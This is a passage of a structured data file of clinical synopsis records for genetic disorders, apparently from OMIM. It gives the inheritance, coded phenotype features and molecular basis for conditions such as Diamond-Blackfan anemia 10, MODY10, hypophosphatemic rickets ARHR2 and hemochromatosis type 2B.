'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': True,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613309,
'prefix': '#',
'preferredTitle': 'DIAMOND-BLACKFAN ANEMIA 10; DBA10',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'growthHeight': 'Short stature (in some patients) {UMLS C2751301} {HPO HP:0004322 C0349588}',
'growthOther': 'Poor growth (in some patients) {UMLS C3280954} {HPO HP:0001510 C0151686,C0456070,C0878787,C1837385,C3552463}',
'headAndNeckFace': '''Mandibulofacial dysostosis (in some patients) {UMLS C4229856} {HPO HP:0005321 C0242387};\nMicrognathia (in some patients) {UMLS C3277936} {HPO HP:0000347 C0025990,C0240295,C1857130} {EOM ID:8bbf61b4ad7ca2ef IMG:Micrognathia-small.jpg};\nMalar hypoplasia (in some patients) {UMLS C4229855} {HPO HP:0000272 C1858085,C4280651} {EOM ID:81db216382f501fc IMG:Malar_Flattening-small.jpg}''',
'headAndNeckEars': '''Microtia (in some patients) {UMLS C4229854} {HPO HP:0008551 C0152423};\nExternal auditory canal atresia (in some patients) {UMLS C4229853} {HPO HP:0000413 C1398325,C1840305,C1857079,C1866190};\nLow-set ears (in some patients) {UMLS C3553628} {HPO HP:0000369 C0239234};\nPosteriorly rotated ears (in some patients) {UMLS C3550632} {HPO HP:0000358 C0431478};\nConductive hearing loss (in some patients) {UMLS C3276776} {HPO HP:0000405 C0018777}''',
'headAndNeckNose': 'Choanal atresia (in some patients) {UMLS C3552333} {HPO HP:0000453 C0008297}',
'headAndNeckMouth': 'Cleft palate (in some patients) {UMLS C3275332} {HPO HP:0000175 C0008925,C2981150}',
'headAndNeckNeck': 'Wide neck (in some patients) {UMLS C4229852} {HPO HP:0000475 C1853638} {EOM ID:1f45b748bb5aa8fe IMG:Neck,Broad-small.jpg}',
'cardiovascularHeart': 'Ventricular septal defect (in some patients) {UMLS C1843489} {HPO HP:0001629 C0018818}',
'cardiovascularVascular': 'Patent ductus arteriosus (in some patients) {UMLS C3280787} {HPO HP:0001643 C0013274}',
'respiratory': 'Respiratory difficulties (in some patients) {UMLS C4227383} {HPO HP:0002098 C0013404,C0476273}',
'chestDiaphragm': 'Diaphragmatic hernia (in some patients) {UMLS C3278412} {HPO HP:0000776 C0235833}',
'genitourinaryKidneys': '''Duplicated kidney (in some patients) {UMLS C4229858};\nRenal ectopia (in some patients) {UMLS C4229857} {HPO HP:0000086 C0238207}''',
'hematology': '''Macrocytic anemia {SNOMEDCT:83414005} {UMLS C1420653,C0002886 HP:0001972} {HPO HP:0001972 C0002886};\nIncreased fetal hemoglobin {UMLS C0239941 HP:0011904};\nIncreased erythrocyte adenosine deaminase activity {UMLS C4230444};\nReticulocytopenia {SNOMEDCT:124961001} {UMLS C0858867 HP:0001896} {HPO HP:0001896 C0858867};\nBone marrow shows decreased erythroid progenitors {UMLS C4229851}''',
'miscellaneous': '''Onset in infancy {UMLS C1848924 HP:0003593} {HPO HP:0003593 C1848924};\nVariable expressivity, even within families {UMLS C4229849}''',
'molecularBasis': 'Caused by mutation in the ribosomal protein S26 gene (RPS26, {603701.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': True,
'growthWeightExists': False,
'growthOtherExists': True,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': True,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': True,
'cardiovascularExists': True,
'cardiovascularHeartExists': True,
'cardiovascularVascularExists': True,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': True,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': True,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': True,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': True,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613310,
'prefix': '#',
'preferredTitle': 'EXUDATIVE VITREORETINOPATHY 5; EVR5',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'headAndNeckEyes': '''Avascularity of peripheral retina {UMLS C3808307};\nRetinal exudates {SNOMEDCT:39832008} {UMLS C0240897 HP:0001147} {HPO HP:0001147 C0240897};\nDecreased visual acuity (in some patients) {UMLS C3554187} {HPO HP:0007663 C0234632};\nTractional retinal detachment (in some patients) {UMLS C3808308} {HPO HP:0007917 C1866178};\nShallow anterior chamber (in some patients) {UMLS C3808309} {HPO HP:0000594 C0423276};\nNasally displaced pupils (in some patients) {UMLS C3808310};\nAbnormal vascularization of the iris on indocyanine green angiography (in some patients) {UMLS C3808311}''',
'miscellaneous': '''Visual acuity varies considerably, depending on the presence of secondary defects such as retinal exudates or detachment {UMLS C3808313};\nSeverely affected individuals may carry 2 mutated alleles {UMLS C3808314}''',
'molecularBasis': 'Caused by mutation in the tetraspanin-12 gene (TSPAN12, {613138.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613370,
'prefix': '#',
'preferredTitle': 'MATURITY-ONSET DIABETES OF THE YOUNG, TYPE 10; MODY10',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'endocrineFeatures': 'Diabetes mellitus {SNOMEDCT:73211009} {ICD10CM:E08-E13} {ICD9CM:250} {UMLS C0011849 HP:0000819} {HPO HP:0000819 C0011849}',
'miscellaneous': '''Diagnosed in second or third decade of life {UMLS C3278782};\nOccasionally low-dose insulin required {UMLS C3278783}''',
'molecularBasis': 'Caused by mutation in the insulin gene (INS, {176730.0014})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': True,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613312,
'prefix': '#',
'preferredTitle': 'HYPOPHOSPHATEMIC RICKETS, AUTOSOMAL RECESSIVE, 2; ARHR2',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'growthHeight': 'Short stature {SNOMEDCT:422065006,237837007,237836003} {ICD10CM:R62.52,E34.3} {ICD9CM:783.43} {UMLS C0013336,C0349588,C2237041,C2919142 HP:0004322,HP:0003510} {HPO HP:0004322 C0349588}',
'headAndNeckTeeth': '''Hypoplastic teeth (in 1 patient) {UMLS C4747623} {HPO HP:0000685 C0235357,C4280611};\nDental caries (rare) {UMLS C4747624} {HPO HP:0000670 C0011334,C4280623}''',
'cardiovascularHeart': 'Thickening of aortic valves (in 1 patient) {UMLS C4747633}',
'cardiovascularVascular': '''Aortic root dissection (in 1 patient) {UMLS C4747634};\nPulmonary stenosis, mild (in 1 patient) {UMLS C4747635} {HPO HP:0001642 C1956257}''',
'genitourinaryKidneys': 'Medullary nephrocalcinosis (in 1 patient) {UMLS C4747622} {HPO HP:0012408 C0403477}',
'skeletal': 'Delayed bone age {SNOMEDCT:123983008} {UMLS C0541764 HP:0002750} {HPO HP:0002750 C0541764}',
'skeletalPelvis': 'Coxa valga (in 1 patient) {UMLS C4313573} {HPO HP:0002673 C0239137,C3549698}',
'skeletalLimbs': '''Slight widening of the wrist {UMLS C4747625};\nWidening of growth pate of radius {UMLS C4747626};\nWidening of growth plate of ulna {UMLS C4747627};\nCupping of growth plate of radius {UMLS C4747628};\nCupping of growth plate of ulna {UMLS C4747629};\nBowing of femur {UMLS C1859461 HP:0002980};\nGenu valgum {SNOMEDCT:52012001,299330008} {ICD10CM:M21.06} {ICD9CM:736.41} {UMLS C0576093,C0158484 HP:0002857} {HPO HP:0002857 C0576093};\nGenu varum {SNOMEDCT:64925008,299331007} {ICD10CM:M21.16} {ICD9CM:736.42} {UMLS C0158485,C0544755 HP:0002970,HP:0002979} {HPO HP:0002970 C0544755};\nBowing of tibia {UMLS C1837081 HP:0002982}''',
'laboratoryAbnormalities': '''Hypophosphatemia {SNOMEDCT:4996001} {UMLS C0595888,C0085682,C4554637 HP:0002148} {HPO HP:0002148 C0085682};\nHyperphosphaturia {SNOMEDCT:85487008,22450000} {UMLS C0268079,C0282201,C0948023 HP:0003109} {HPO HP:0003109 C0268079,C0948023};\nElevated plasma alkaline phosphatase {UMLS C4747630};\nNormal calcium level {UMLS C0860970};\nNormal calcium excretion {UMLS C4747631};\nNormal PTH {UMLS C0858303};\nNormal vitamin D metabolites {UMLS C4747632}''',
'miscellaneous': '''Normal renal function {SNOMEDCT:81141003} {UMLS C0232805};\nNo vascular or periarticular calcifications {UMLS C4747637}''',
'molecularBasis': 'Caused by mutation in the ectonucleotide pyrophosphatase/phosphodiesterase-1 gene (ENPP1, {173335.0010})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': True,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': True,
'headAndNeckNeckExists': False,
'cardiovascularExists': True,
'cardiovascularHeartExists': True,
'cardiovascularVascularExists': True,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': True,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': True,
'skeletalLimbsExists': True,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613371,
'prefix': '%',
'preferredTitle': 'SPINOCEREBELLAR ATAXIA 30; SCA30',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'headAndNeckEyes': '''Hypermetric saccades {SNOMEDCT:246769000} {UMLS C0423083 HP:0007338} {HPO HP:0007338 C0423083};\nGaze-evoked nystagmus (1 patient) {UMLS C3278786} {HPO HP:0000640 C0271390}''',
'neurologicCentralNervousSystem': '''Ataxia, gait and appendicular {UMLS C3278784};\nDysarthria {SNOMEDCT:8011004} {ICD9CM:438.13,784.51} {UMLS C0013362,C4553903 HP:0001260} {HPO HP:0001260 C0013362};\nHyperreflexia, lower limbs, mild {UMLS C3278785};\nCerebellar atrophy {UMLS C0740279 HP:0001272} {HPO HP:0001272 C0262404,C0740279,C4020873}''',
'miscellaneous': '''Adult onset (45 to 76 years) {UMLS C3278787} {HPO HP:0003581 C1853562};\nInsidious onset {SNOMEDCT:367326009} {UMLS C1298634 HP:0003587} {HPO HP:0003587 C0332164,C1298634};\nSlow progression {UMLS C1854494 HP:0003677} {HPO HP:0003677 C1854494};\nOne family has been reported (as of 4/2010) {UMLS C3278788}''',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': False,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613313,
'prefix': '#',
'preferredTitle': 'HEMOCHROMATOSIS, TYPE 2B; HFE2B',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'cardiovascularHeart': '''Heart failure {SNOMEDCT:84114007,42343007} {ICD10CM:I50,I50.9} {ICD9CM:428,428.9,428.0} {UMLS C0018801,C0018802,C4554158 HP:0001635} {HPO HP:0001635 C0018801,C0018802};\nCardiomyopathy {SNOMEDCT:57809008,85898001} {ICD10CM:I42,I51.5,I42.9} {ICD9CM:425} {UMLS C0878544 HP:0001638} {HPO HP:0001638 C0878544}''',
'abdomenLiver': '''Fibrosis {SNOMEDCT:263756000,112674009} {UMLS C0016059,C4285457};\nCirrhosis {SNOMEDCT:19943007} {ICD10CM:K74.60} {UMLS C1623038,C0023890 HP:0001394} {HPO HP:0001394 C0023890};\nHepatomegaly {SNOMEDCT:80515008} {ICD10CM:R16.0} {ICD9CM:789.1} {UMLS C0019209 HP:0002240} {HPO HP:0002240 C0019209}''',
'abdomenSpleen': 'Splenomegaly {SNOMEDCT:16294009} {ICD10CM:R16.1} {ICD9CM:789.2} {UMLS C0038002 HP:0001744} {HPO HP:0001744 C0038002}',
'genitourinaryExternalGenitaliaMale': 'Hypogonadism {SNOMEDCT:48130008} {UMLS C0020619 HP:0000135} {HPO HP:0000135 C0020619}',
'genitourinaryExternalGenitaliaFemale': 'Hypogonadism {SNOMEDCT:48130008} {UMLS C0020619 HP:0000135} {HPO HP:0000135 C0020619}',
'skinNailsHairSkin': 'Hyperpigmentation {SNOMEDCT:4830009,49765009} {UMLS C1962962,C0162834 HP:0000953}',
'hematology': 'Anemia {SNOMEDCT:271737000} {ICD10CM:D64.9} {ICD9CM:285.9} {UMLS C0002871,C4554633,C1000483 HP:0001903} {HPO HP:0001903 C0002871,C0162119}',
'laboratoryAbnormalities': '''Increased serum iron {SNOMEDCT:165624002} {UMLS C0151900 HP:0003452} {HPO HP:0003452 C0151900};\nIncreased serum ferritin {UMLS C0241013 HP:0003281} {HPO HP:0003281 C0241013,C0743912,C3854388};\nIncreased transaminases {UMLS C0438717 HP:0002910} {HPO HP:0002910 C0086565,C0151766,C0235996,C0438237,C0438717,C0877359,C1842003,C1848701};\nIncreased or complete (100%) transferrin saturation {UMLS C4478919}''',
'miscellaneous': 'Onset is usually before 30 years of age {UMLS C4478921}',
'molecularBasis': 'Caused by mutation in the hepcidin antimicrobial peptide gene (HAMP, {606464.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': True,
'cardiovascularHeartExists': True,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': True,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': True,
'genitourinaryExternalGenitaliaFemaleExists': True,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': True,
'skinNailsHairSkinExists': True,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': True,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613375,
'prefix': '#',
'preferredTitle': 'MATURITY-ONSET DIABETES OF THE YOUNG, TYPE 11; MODY11',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'growthWeight': '''Overweight {SNOMEDCT:238131007} {ICD10CM:E66.3} {ICD9CM:278.02} {UMLS C0497406 HP:0025502} {HPO HP:0025502};\nObesity {SNOMEDCT:414915002,414916001} {ICD10CM:E66.9} {ICD9CM:278.00} {UMLS C1963185,C0028754 HP:0001513} {HPO HP:0001513 C0028754}''',
'endocrineFeatures': 'Diabetes mellitus {SNOMEDCT:73211009} {ICD10CM:E08-E13} {ICD9CM:250} {UMLS C0011849 HP:0000819} {HPO HP:0000819 C0011849}',
'miscellaneous': 'Some patients require insulin for treatment {UMLS C3278790}',
'molecularBasis': 'Caused by mutation in the BLK nonreceptor tyrosine kinase gene (BLK, {191305.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': False,
'growthWeightExists': True,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
